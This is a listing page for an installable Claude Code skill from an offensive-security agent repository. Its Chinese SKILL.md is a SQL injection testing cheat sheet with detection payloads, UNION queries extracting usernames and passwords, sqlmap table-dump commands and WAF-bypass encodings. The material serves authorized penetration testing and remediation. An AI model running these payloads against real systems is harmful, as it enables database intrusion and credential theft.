Skill4.5k estrellas del repoactualizado today

sql-injection-testing

This Claude Code skill provides systematic methodologies for identifying and testing SQL injection vulnerabilities in web applications. It covers parameter identification, detection techniques including boolean and time-based blind injection, database fingerprinting across MySQL, PostgreSQL, MSSQL, and Oracle platforms, automated tools like sqlmap with command syntax, WAF bypass techniques using encoding and obfuscation, and verification protocols. Use this skill when conducting authorized penetration testing to assess application security, extract proof of vulnerability, and document exploitation for remediation recommendations.

Ver fuente Repositorio: CyberStrikeAI

Instalar en Claude Code

Copiar

git clone --depth 1 https://github.com/Ed1s0nZ/CyberStrikeAI /tmp/sql-injection-testing && cp -r /tmp/sql-injection-testing/skills/sql-injection-testing ~/.claude/skills/sql-injection-testing

Después abre una sesión nueva de Claude Code; el skill carga automáticamente.

Definición

SKILL.md

# SQL注入测试技能

## 概述

SQL注入是一种常见且危险的Web应用漏洞。本技能提供了系统化的SQL注入测试方法、检测技术和利用策略。

## 测试方法

### 1. 参数识别
- 识别所有用户输入点：URL参数、POST数据、HTTP头、Cookie等
- 重点关注：id、search、filter、sort等参数
- 使用Burp Suite或类似工具拦截和修改请求

### 2. 基础检测
- 单引号测试：`'` - 查看是否出现SQL错误
- 布尔盲注：`' AND '1'='1` vs `' AND '1'='2`
- 时间盲注：`' AND SLEEP(5)--`
- 联合查询：`' UNION SELECT NULL--`

### 3. 数据库识别
- MySQL：`' AND @@version LIKE '%mysql%'--`
- PostgreSQL：`' AND version() LIKE '%PostgreSQL%'--`
- MSSQL：`' AND @@version LIKE '%Microsoft%'--`
- Oracle：`' AND (SELECT banner FROM v$version WHERE rownum=1) LIKE '%Oracle%'--`

### 4. 信息提取
- 数据库名：`' UNION SELECT database()--`
- 表名：`' UNION SELECT table_name FROM information_schema.tables--`
- 列名：`' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--`
- 数据提取：`' UNION SELECT username,password FROM users--`

## 工具使用

### sqlmap
```bash
# 基础扫描
sqlmap -u "http://target.com/page?id=1"

# 指定参数
sqlmap -u "http://target.com/page" --data="id=1" --method=POST

# 指定数据库类型
sqlmap -u "http://target.com/page?id=1" --dbms=mysql

# 获取数据库列表
sqlmap -u "http://target.com/page?id=1" --dbs

# 获取表
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump
```

### 手动测试
- 使用Burp Suite的Repeater模块
- 使用浏览器开发者工具
- 编写Python脚本自动化测试

## 绕过技术

### WAF绕过
- 编码绕过：URL编码、Unicode编码、十六进制编码
- 注释绕过：`/**/`, `--`, `#`
- 大小写混合：`SeLeCt`, `UnIoN`
- 空格替换：`/**/`, `+`, `%09`(Tab), `%0A`(换行)

### 示例
```
原始：' UNION SELECT NULL--
绕过1：'/**/UNION/**/SELECT/**/NULL--
绕过2：'%55nion%20select%20null--
绕过3：'/*!UNION*//*!SELECT*/null--
```

## 验证和报告

### 验证步骤
1. 确认可以执行SQL语句
2. 提取数据库信息验证
3. 评估影响范围（数据泄露、权限提升等）
4. 记录完整的POC（请求/响应）

### 报告要点
- 漏洞位置和参数
- 影响的数据和系统
- 完整的利用步骤
- 修复建议（参数化查询、输入验证等）

## 注意事项

- 仅在授权测试环境中进行
- 避免对生产数据造成破坏
- 谨慎使用DROP、DELETE等危险操作
- 记录所有测试步骤以便复现

Del mismo repositorio

漏洞分诊专员Subagent

基于攻击面与证据线索进行漏洞候选筛选、优先级排序与“验证路径”设计（以证据为中心，不直接武器化），并要求主 Agent 提供完整目标与输入证据。

Plan-Execute 规划主代理Subagent

plan_execute 模式下的规划/重规划侧主代理：拆解目标、修订计划，由执行器调用 MCP 工具落地（不使用 Deep 的 task 子代理）；计划中每步须含完整目标与范围，禁止让执行器凭猜测补全 URL/IP。

Supervisor 监督主代理Subagent

supervisor 模式下的协调者：通过 transfer 委派专家子代理，必要时亲自使用 MCP；完成目标时用 exit 结束（运行时会追加专家列表与 exit 说明）；transfer 前必须提供完整目标与范围。

find-skillsSkill

Helps users discover and install agent skills when they ask questions like "how do I do X", "find a skill for X", "is there a skill that can...", or express interest in extending capabilities. This skill should be used when the user is looking for functionality that might exist as an installable skill.

api-security-testingSkill

API安全测试的专业技能和方法论

business-logic-testingSkill

业务逻辑漏洞测试的专业技能和方法论

cloud-security-auditSkill

云安全审计的专业技能和方法论

command-injection-testingSkill

命令注入漏洞测试的专业技能和方法论